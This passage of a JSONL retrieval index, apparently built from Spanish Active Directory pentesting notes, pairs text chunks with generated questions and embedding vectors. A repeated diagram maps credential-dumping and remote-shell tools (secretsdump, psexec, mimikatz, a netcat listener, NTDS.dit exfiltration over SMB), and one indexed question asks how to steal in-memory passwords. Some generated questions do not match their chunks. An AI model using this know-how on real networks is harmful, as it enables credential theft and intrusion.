0.08424, 0.01299, 0.02354, 0.0385, 0.05575, 0.08211, 0.0442, -0.01972, 0.0669, -0.04243, 0.05281, -0.06098, -0.06128, 0.03068, -0.05998, -0.05253, -0.0305, 0.06297, -0.05553, 0.08102, -0.01241, -0.06686, -0.06979, -0.08225, 0.03392, 0.02169, -0.11064, -0.05004, 0.02491, -0.08437, 0.09862, 0.13916, 0.0232, -0.01529, -0.04662, 0.08242, -0.06667, -0.00404, -0.04501, -0.04423, -0.06217, 0.02551, -0.1022, -0.0675, 0.0415, -0.00013, -0.012, -0.03661, 0.02256, -0.00868, 0.01787, -0.09304, -0.03899, 0.01088, 0.00722, -0.02545, 0.02098, -0.03183, 0.0103, 0.04569, -0.03863, -0.05363, 0.02778, 0.0285, -0.06304, -0.03809, 0.06784, 0.04088, 0.05458, -0.02498, -0.03402, -0.02623, 0.06162, -0.00397, -0.09612, -0.09072, 0.04613, 0.01291, 0.09133, 0.01973, 0.04318, -0.0561, -0.00638, 0.02121, 0.0107, 0.04016, 0.143, -0.0025, 0.04413, -0.0177, 0.04987, -0.0269, -0.03488, -0.03889, -0.07082, 0.14771, -0.04269, -0.03347, 0.0938, -0.02112, -0.00893, -0.00521, -0.05906, -0.06396, -0.05797, 0.02335, -0.01092, 0.04667, -0.04133, -0.08131, 0.00518, -0.02568, -0.0113, 0.08008, 0.02235, 0.04947, -0.01982, -0.0483, -0.01478, 0.00741, 0.03147, 0.05397, -0.0521, -0.03942, 0.07988, 0.02735, 0.01148, -0.01509, 0.00128, -0.04111, -0.01945, 0.01685, 0.00928, -0.07074, 0.05535, 0.02376, 0.07724, 0.0469, -0.00749, 0.09193, -0.05014, -0.0819, 0.00185, 0.04166, -0.00034, -0.00067, 0.03871, 0.07409, 0.01786, 0.07279, 0.01361, -0.04392, -0.04374, -0.03612, -0.06056, 0.03134, 0.06058, 0.01338, -0.04482, 0.03572, -0.04463, -0.01089, -0.03939, 0.10115, 0.05669, -0.07687, -0.00869, 0.05185, 0.01581, -0.01897, -0.02514, 0.00695, -0.05009, -0.07029, 0.03577, 0.01563, -0.08003, -0.01971, 0.0663, -0.02039, -0.05614, 0.03893, -0.01084]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "cual es una alternativa libre a Mimikatz para extraer credenciales?", "v": [-0.16941, 0.05795, -0.09118, 0.14334, 0.03651, 0.02918, -0.13759, 0.02547, -0.27739, -0.15616, 0.00996, -0.08637, -0.01227, 0.00779, 0.21325, -0.06616, 0.10667, -0.02166, 0.18294, -0.05191, -0.01242, -0.0746, -0.07075, -0.10293, -0.04085, -0.03226, -0.00229, 0.05905, -0.00835, 0.05464, 0.04739, 0.03697, -0.01702, 0.03193, 0.07142, 0.07601, 0.10023, 0.0307, 0.04948, -0.05835, 0.06069, -0.02027, -0.0147, 0.09229, -0.00882, -0.07792, -0.00627, 0.06066, 0.04733, 0.01408, -0.08337, -0.03359, -0.0226, 0.00313, 0.03516, -0.00958, 0.04344, -0.07991, -0.15091, 0.0137, -0.01294, -0.03422, 0.05957, -0.01587, 0.02431, -0.00603, -0.10874, -0.01427, -0.11538, 0.12118, 0.01061, -0.03086, 0.10006, -0.09658, -0.12284, 0.04447, -0.05856, -0.05037, 0.0282, 0.02718, 0.03353, -0.064, 0.03835, 0.0554, 0.05783, -0.03709, 0.0296, -0.10839, -0.06835, 0.10099, 0.03868, 0.06048, -0.00363, 0.05836, -0.11243, -0.04203, -0.01677, 0.10021, -0.05609, 0.098, 0.00139, -0.0393, -0.13971, 0.07848, -0.01213, -0.04317, -0.00625, 0.03464, -0.07726, -0.01201, 0.01313, 0.0293, -0.02335, -0.00796, -0.06623, -0.02023, -0.08242, 0.05553, -0.03298, -0.02447, 0.04226, -0.08088, 0.0665, -0.12522, -6e-05, -0.03417, -0.0476, 0.03867, -0.05943, -0.03172, 0.03268, 0.00881, -0.00695, -0.07226, 0.00596, -0.10497, 0.13146, -0.08211, -0.03916, 0.01555, -0.01634, -0.11605, 0.01086, -0.01327, 0.05502, -0.01902, -0.03494, -0.01372, 0.06792, -0.11362, -0.08607, 0.09393, 0.05451, 0.07745, -0.04008, 0.03972, 0.04325, 0.02742, -0.08539, 0.04862, 0.03215, -0.12373, 0.04536, -0.0001, -0.01658, 0.00158, 0.01294, -0.04106, -0.08971, 0.00026, 0.02179, 0.06617, 0.03254, -0.04484, 0.076, -0.02936, 0.0012, -0.05793, 0.02896, -0.07382, 0.04453, 0.05198, -0.06175, -0.01669, -0.02923, -0.04457, 0.02935, 0.0649, -0.01591, 0.01833, -0.0271, -0.00086, -0.0368, -0.0581, -0.04483, 0.02598, 0.06183, -0.10913, -0.03004, -0.02452, -0.06536, -0.00907, -0.00254, -0.04538, 0.01183, 0.01374, -0.00475, 0.02653, 0.01218, 0.03293, 0.07699, 0.03565, 0.11746, 0.00849, -0.07108, 0.01125, 0.00052, -0.04698, 0.00986, -0.07692, 0.0169, 0.01605, 0.04414, 0.05644, 0.00704, 0.02702, 0.01253, 0.04042, -0.05101, 0.02231, 0.02213, -0.01896, 0.02028, 0.0174, 0.00476, -0.0159, -0.02404, 0.04109, -0.00866, -0.02837, 0.02994, 0.02222, -0.01295, -0.05183, -0.0247, 0.03541, -0.09336, 0.04752, -0.02879, -0.0666, -0.00407, 0.03098, 0.04312, 0.01657, 0.09322, 0.01331]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "ΒΏCon quΓ© programa puedo hacer mapas mentales?", "v": [0.06806, 0.15115, 0.02292, -0.01546, -0.04087, -0.04615, -0.05507, 0.02697, -0.28658, -0.08557, 0.05433, 0.1272, 0.13029, -0.01138, -0.0415, 0.14292, 0.20879, 0.06062, 0.05473, -0.08886, -0.00442, -0.09402, -0.08883, -0.02641, -0.00763, -0.05785, 0.08468, -0.0187, -0.05507, -0.06066, -0.00565, 0.09446, 0.04784, -0.05733, -0.01801, 0.069, 0.07102, 0.02989, 0.02905, -0.09138, -0.03812, 0.02534, 0.00333, 0.02031, 0.05437, -0.09081, -0.02583, -0.01405, -0.02202, 0.00391, -0.02074, -0.02226, -0.0058, -0.04977, 0.03267, -0.10798, -0.01141, -0.07763, -0.02157, -0.04461, 0.01577, 0.018, 0.04142, 0.02108, -0.0089, 0.00954, 0.16856, 0.06457, -0.04608, 0.11496, -0.10419, 0.03509, 0.08494, -0.05186, -0.00188, 0.01171, -0.07789, -0.10008, 0.04426, -0.01108, -0.02135, -0.00769, -0.02123, 0.07027, -0.03223, -0.04492, -0.04486, -0.01694, 0.00562, -0.09354, -0.03678, 0.08149, 0.05593, 0.1024, -0.00201, 0.00268, 0.07607, 0.11415, -0.0308, 0.10308, -0.06173, -0.04259, -0.14531, 0.06006, -0.12988, 0.00607, 0.06393, -0.02209, -0.06374, 0.06171, 0.0335, 0.06097, -0.16024, -0.01323, -0.01731, 0.04631, -0.03775, 0.11125, 0.05961, -0.01238, -0.08152, 0.10596, 0.02621, -0.01336, 0.09953, 0.05582, -0.05126, 0.08677, -0.00122, 0.05375, 0.00575, 0.03191, -0.04985, -0.07218, -0.08266, -0.02066, 0.0346, 0.00136, 0.08219, -0.02839, 0.01299, -0.00563, 0.04924, 0.01905, -0.07269, -0.00379, 0.00059, -0.06889, -0.00902, 0.02409, 0.052, 0.04834, 0.06232, 0.02138, 0.05417, -0.04039, 0.05324, -0.06649, -0.08339, 0.07546, -0.04208, 0.01355, -0.01627, 0.03025, 0.06807, -0.06759, -0.01743, 0.03792, 0.06194, 0.15235, -0.0389, -0.03825, 0.07389, -0.07506, 0.03882, -0.06031, -0.02309, -0.01144, 0.05627, -0.01521, -0.10954, -0.01107, 0.09605, -0.01172, -0.07467, 0.01328, -0.01536, 0.03786, 0.07007, -0.09979, -0.08751, 0.04933, -0.00664, -0.02433, 0.06875, -0.04943, 0.07646, 0.0383, -0.05236, -0.02555, 0.0003, -0.04523, 0.03654, -0.00378, -0.01766, 0.12651, -0.00185, 0.02193, 0.06336, 0.12537, -0.07199, -0.09628, 0.06743, -0.06905, -0.02286, -0.00032, -0.06451, 0.05187, 0.05051, 0.00338, -0.00082, 0.01774, -0.02155, 0.07412, 0.01819, 0.02793, 0.04438, 0.0688, 0.01519, 0.07288, 0.03045, -0.06849, 0.03775, -0.02235, 0.03783, -0.00081, -0.00275, -0.04043, -0.00459, -0.0324, -0.01981, 0.03401, 0.003, -0.03213, -0.00145, -0.01423, -0.01367, 0.02308, 0.04078, -0.01017, -0.03778, -0.00039, 0.04343, -0.02273, 0.07085, 0.04497]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "ΒΏQuΓ© herramienta sirve para organizar ideas en forma de Γ‘rbol?", "v": [-0.10748, 0.10079, -0.06138, -0.14708, 0.00449, -0.11485, -0.03796, -0.02117, -0.04798, -0.09935, -0.15399, -0.09713, 0.03098, -0.06341, 0.09554, -0.01049, 0.17486, -0.04966, -0.04955, 0.06672, -0.03194, 0.08486, -0.11037, 0.04528, -0.10647, -0.14341, 0.05507, 0.02036, -0.1723, 0.10392, -0.06431, 0.02541, 0.1146, -0.09691, -0.10178, -0.03168, 0.03147, 0.10494, -0.10253, -0.01273, -0.18618, 0.03051, -0.03067, 0.119, -0.05022, 0.00118, -0.08848, -0.00551, -0.01003, 0.12722, -0.07556, -0.0704, -0.03751, -0.06691, -0.04433, -0.12799, -0.00121, -0.13144, 0.05982, -0.0679, -0.10869, -0.01042, -0.05646, -0.11075, 0.01076, 0.01269, -0.0511, 0.01768, -0.00043, -0.03458, -0.04921, -0.10468, 0.042, -0.06285, 0.05261, 0.07831, 0.06368, -0.00991, -0.02995, 0.08635, 0.09483, -0.00725, -0.09836, 0.00277, 0.00943, -0.02529, 0.04783, 0.01142, 0.04732, -0.09526, -0.11236, 0.04683, 0.02831, 0.05249, -0.04568, -0.01351, -0.03622, 0.04296, 0.04635, 0.04015, 0.0827, -0.09934, -0.01778, 0.06513, -0.07663, 0.01746, -0.07124, 0.05935, -0.07426, 0.04465, 0.00126, 0.04158, 0.04007, 0.09185, -0.02019, 0.00976, 0.02298, -0.07292, -0.0079, 0.02367, 0.04709, 0.13319, -0.02835, 0.02339, 0.01201, 0.01699, 0.01902, 0.18892, -0.00113, -0.0378, 0.01445, -0.08304, -0.10937, 0.0094, -0.08046, -0.06274, 0.04565, -0.12694, -0.01974, -0.01814, -0.01437, 0.08067, -0.13793, -0.11568, 0.0122, -0.02057, 0.06737, 0.04319, -0.01209, -0.03084, 0.07038, -0.06261, 0.02752, 0.01736, 0.02325, -0.01981, -0.0606, -0.00665, -0.05085, 0.06274, -0.07935, -0.06826, 0.03469, 0.02249, 0.03394, -0.05463, 0.09122, 0.02824, 0.10024, 0.03189, 0.01186, 0.01429, 0.04153, 0.01824, -0.01078, -0.05607, -0.06215, -0.0026, 0.0479, 0.02002, -0.00128, 0.02619, -0.07257, -0.01861, 0.01043, -0.03971, 0.08518, -0.04229, -0.02263, 0.0111, -0.01844, 0.03345, -0.00519, -0.08833, 0.03191, -0.03267, -0.02219, -0.03113, 0.03912, 0.00102, -0.01011, -0.05419, -0.04235, 0.0193, 0.09047, 0.01929, -0.03302, -0.03057, 0.0109, 0.11512, 0.02974, 3e-05, 0.06693, 0.03323, -0.01691, -0.04963, -0.02243, 0.00225, -0.00812, -0.02416, -0.01117, 0.02481, 0.03358, -0.01224, 0.0021, 0.05173, -0.011, 0.05198, 0.01318, 0.04265, -0.02217, -0.01873, 0.04621, 0.03375, -0.016, -0.09521, 0.0365, -0.00316, -0.03707, -0.00219, -0.00542, -0.00238, 0.0201, 0.0379, -0.08223, -0.03681, 0.00022, 0.03012, -0.0514, -0.05867, -0.02024, -0.03115, 0.05124, -0.01392, -0.02882, -0.03411]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "ΒΏExiste una alternativa libre a los mapas mentales?", "v": [0.08421, 0.06651, -0.00825, 0.01577, -0.14322, 0.01794, -0.19337, -0.01524, -0.25781, -0.01964, 0.09327, -0.01277, 0.0941, 0.11643, 0.08862, 0.02304, 0.18337, 0.07752, 0.06066, -0.13301, -0.04629, -0.06429, -0.13599, -0.00167, 0.02695, -0.08449, -0.00772, -0.03335, -0.07221, -0.00242, -0.01041, 0.07683, -0.00171, -0.06456, 0.0204, 0.06012, 0.15292, -0.02469, 0.08765, -0.13998, 0.05147, -0.02716, 0.01149, 0.05993, -0.03766, -0.08709, -0.12514, 0.07324, 0.04423, 0.13505, -0.0259, -0.04457, -0.07283, -0.00595, 0.05468, -0.06468, 0.06911, -0.06245, -0.05738, -0.05879, -0.03524, 0.05617, 0.05581, 0.00158, -0.00446, 0.05996, 0.11174, 0.07289, -0.0756, 0.13473, -0.06009, 0.01311, 0.05212, -0.03319, -0.08148, -0.01711, -0.0921, -0.09367, -0.01235, 0.12346, 0.01156, -0.08037, -0.03067, 0.05273, -0.01714, -0.06289, 0.00841, -0.07873, 0.02825, 0.01338, 0.00201, 0.0488, 0.03413, 0.13755, -0.04868, -0.04613, -0.03506, 0.1326, -0.02732, 0.07777, -0.01941, 0.02991, -0.11444, -0.03594, -0.07851, -0.09681, 0.01752, 0.0328, -0.10384, 0.05724, 0.04965, 0.0883, -0.04833, 0.00519, 0.03525, -0.03354, -0.01561, 0.13945, -0.00563, 0.01139, -0.03308, 0.03001, 0.05566, -0.0485, 0.02369, 0.00497, -0.01099, 0.01927, 0.04673, 0.00976, 0.03038, -0.00324, -0.07355, -0.07652, -0.15003, 0.01023, 0.07892, 0.03526, 0.08971, 0.03021, -0.02791, -0.01159, 0.02037, 0.00418, -0.08523, -0.00965, -0.00695, 0.00719, 0.04961, -0.00752, -0.02589, -0.00958, 0.07747, 0.07625, 0.05597, -0.00207, 0.01198, -0.03868, -0.09195, 0.09898, 0.01267, -0.03258, 0.00723, 0.06222, -0.00345, -0.05344, 0.00647, 0.00404, -0.02686, 0.09254, 0.00478, -0.03782, 0.10673, -0.05887, 0.04412, -0.08038, -0.00822, -0.0443, 0.05643, 0.01977, -0.03971, -0.06066, -0.00771, -0.05346, -0.07265, 0.01785, 0.00485, 0.0099, 0.06455, -0.08802, -0.09137, 0.03227, -0.03701, -0.0741, 0.04361, -0.00558, 0.11149, -0.00803, -0.09659, 0.00067, -0.00768, -0.05116, 0.03626, -0.04156, -0.05794, 0.04903, -0.0173, 0.04346, 0.02838, 0.08235, -0.05804, -0.04409, 0.06066, -0.06504, -0.01497, -0.00725, -7e-05, -0.01932, -0.00881, -0.05634, 0.01013, 0.04465, -0.02603, 0.05217, 0.00981, 0.08615, 0.03147, 0.08418, -0.03507, 0.03502, 0.05979, -0.03225, 0.0329, 0.04087, 0.01004, 0.00085, 0.02568, 0.00668, 0.02852, -0.00054, 0.02612, 0.02398, -0.0465, -0.00952, -0.03963, -0.02878, -0.04073, -0.01351, 0.0348, -0.04502, -0.02451, 0.00481, 0.02969, 0.02711, 0.06053, 0.06027]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© herramienta me sirve para ver la estructura de los usuarios en un dominio Windows?", "v": [-0.08587, 0.05155, -0.11755, -0.20569, -0.02927, -0.05615, -0.09673, -0.12834, -0.00057, -0.1116, -0.03669, -0.16254, 0.00112, -0.17993, -4e-05, -0.06222, 0.14826, -0.11099, -0.01396, -0.01518, -0.05091, -0.06858, -0.04286, 0.04731, -0.1132, -0.0411, 0.02813, -0.10648, -0.12212, 0.1093, 0.04942, 0.01043, -0.01114, -0.04437, -0.07602, -0.02633, -0.00172, 0.06318, 0.06554, 0.14961, 0.04002, 0.0721, -0.08362, 0.0736, 0.00723, 0.02955, 0.00139, -0.10424, 0.04877, 0.01785, -0.07518, -0.13494, -0.10987, 0.005, 0.0445, -0.13006, 0.17615, -0.17759, 0.06974, -0.07611, -0.14698, 0.02683, -0.04333, 0.06053, -0.03393, -0.09067, -0.00124, -0.01501, 0.04488, 0.11546, -0.02406, 0.00747, 0.0776, -0.05259, 0.05757, 0.05122, 0.04438, -0.02199, 0.06974, -0.0386, 0.14108, 0.0909, -0.12917, -0.08043, -0.08216, -0.1182, -0.02858, -0.06397, 0.06084, -0.08795, 0.0639, 0.04553, -0.08163, -0.00041, -0.02277, -0.05483, 0.01013, -0.08693, 0.00563, 0.03647, 0.09818, 0.01885, -0.07588, 0.08119, 0.03629, 0.07789, -0.04049, -0.09496, -0.09132, -0.03479, 0.08489, -0.00143, -0.06759, -0.00264, -0.04021, 0.06486, -0.00562, -0.03262, -0.00649, -0.01579, 0.01177, 0.033, -0.02657, -0.03068, -0.03506, -0.01992, -0.02119, 0.07016, -0.05368, -0.11414, 0.00215, -0.06778, -0.07218, 0.00567, -0.05914, -0.00016, 0.05021, -0.07939, -0.02847, -0.03022, 0.05812, 0.06778, -0.07417, -0.06305, -0.04701, -0.0573, 0.10989, -0.03559, -0.03854, -0.04504, -0.03589, -0.05334, -0.05464, -0.00474, -0.04754, 0.04848, -0.06726, 0.0932, -0.04581, 0.01009, -0.05547, -0.01694, -0.00756, 0.00937, 0.01256, -0.05213, 0.0003, 0.0387, 0.05332, 0.02844, 0.04006, 0.04843, 0.03084, -0.01017, 0.00933, -0.02727, -0.02908, 0.0289, -0.0872, -0.02432, -0.06098, -0.05861, 0.02482, 0.02476, -0.02323, 0.00657, -0.03583, 0.00343, -0.06943, 0.04098, -0.04322, 0.05694, 0.03031, -0.03986, 0.03512, -0.01797, -0.0552, -0.04473, 0.05729, 0.01636, -0.01271, -0.0538, 0.00496, -0.00966, 0.03713, 0.02771, 0.01655, -0.04644, 0.0797, 0.0435, 0.007, 0.02599, -0.04035, -0.04089, -0.01279, -0.02164, 0.04532, 0.02679, -0.02706, -0.07563, -0.04369, 0.01813, 0.01774, -0.01514, -0.01277, 0.01592, -0.06573, -0.03469, -0.00756, -0.00981, 0.02159, -0.02973, 0.02019, 0.04314, 0.01567, -0.07119, 0.01675, -0.01568, -0.0346, -0.00767, -0.08457, 0.06315, 0.01239, -0.06509, -0.05714, -0.04865, -0.00283, -0.01102, -0.06866, -0.05008, -0.02216, -0.032, 0.04496, -0.015, -0.03599, 0.05731]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© puedo robar contraseΓ±as guardadas en memoria desde una mΓ‘quina Windows a travΓ©s del protocolo SMB?", "v": [0.10987, -0.04304, -0.08848, -0.1667, -0.12681, -0.05306, 0.02517, -0.04844, -0.07434, -0.09983, -0.00138, 0.05653, 0.1831, -0.10011, -0.00245, 0.09136, 0.0201, 0.0874, -0.00598, 0.08522, 0.0323, -0.05002, -0.0071, 0.04996, 0.06612, -0.02847, 0.07115, 0.01278, -0.16804, 0.03102, 0.01598, -0.02548, 0.12116, -0.03691, -0.03812, 0.08737, 0.00904, 0.10037, 0.00959, 0.0671, 0.07889, 0.05947, -0.13199, 0.03351, 0.13551, -0.10392, 0.02889, -0.0276, 0.13512, 0.01166, -0.08332, -0.0518, -0.01623, -0.02198, -0.02299, -0.02617, 0.11463, 0.04742, 0.03849, -0.00229, -0.0766, 0.08518, -0.00151, 0.11204, 0.03163, -0.09445, 0.05643, 0.02916, -0.05167, 0.10889, -0.0931, 0.01864, -0.02315, 0.03055, 0.09598, 0.01683, -0.03185, 0.00319, 0.10111, 0.09575, -0.11454, -0.00084, 0.01577, 0.01192, -0.02021, 0.00885, 0.05382, 0.03189, 0.05595, -0.13846, 0.04234, 0.03318, -0.09695, 0.08887, 0.07311, -0.11594, 0.00231, 0.06383, 0.02555, 0.07906, 0.01374, -0.05107, -0.08599, 0.17807, -0.01933, 0.06434, -0.03224, -0.01675, 0.01742, -0.133, -0.00597, 0.03108, -0.07028, -0.00137, -0.09826, 0.02946, 0.02521, -0.05596, -0.00086, 0.03595, -0.03795, -0.02255, -0.03203, -0.02081, 0.02051, -0.0219, 0.01201, 0.15478, -0.10992, -0.05796, 0.01839, 0.09394, -0.02921, -0.04912, -0.0226, 0.06977, -0.0622, -0.09199, -0.0669, -0.05155, 0.0112, 0.06627, -0.04432, 0.05355, -0.00134, 0.03307, 0.09719, 0.00839, -0.09266, -0.01777, 0.05362, 0.00266, -0.03806, 0.0242, -0.03422, 0.11611, -0.02432, -0.06753, -0.08745, 0.06527, -0.07777, 0.02374, -0.05755, 0.01302, -0.03997, -0.01895, -0.02215, 0.05241, 0.05651, -0.03697, 0.01127, -0.0019, -0.00508, -0.01948, -0.01209, -0.00643, -0.02296, -0.05955, 0.01284, -0.04943, -0.11569, 0.0614, -0.00671, -0.01202, -0.03169, -0.08082, 0.05858, 0.04599, -0.01379, -0.05194, -0.00166, -0.02597, 0.03559, 0.063, 0.0007, -0.06765, -0.05882, 0.05219, 0.03826, 0.01576, -0.06569, 0.04843, -0.10079, -0.02094, 0.07566, 0.06058, -0.09388, -0.0413, -0.02301, 0.0196, 0.04812, 0.00224, -0.01552, -0.06217, -0.06828, -0.0314, -0.04798, 0.0288, -0.02819, -0.06821, 0.07902, 0.00852, 0.0656, 0.0342, -0.06511, -0.0388, -0.08827, 